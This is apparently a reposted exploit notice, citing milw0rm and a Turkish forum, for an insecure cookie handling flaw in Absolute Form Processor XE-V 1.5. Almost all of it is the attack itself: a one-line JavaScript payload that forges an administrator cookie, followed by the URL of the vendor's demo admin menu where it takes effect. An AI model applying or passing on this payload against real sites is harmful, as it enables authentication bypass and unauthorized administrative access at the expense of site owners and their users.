Absolute Form Processor XE-V 1.5 Insecure Cookie Handling Vuln

kaynak: http://www.milw0rm.com/exploits/8529

kaynak: http://www.yildirimordulari.com/showthread.php?t=6138

exploit:

javascript:document.cookie = "xlaAFPadmin=lvl=1&userid=1; path=/";

after you go here:

http://www.xigla.com/absolutefp/demo/menu.asp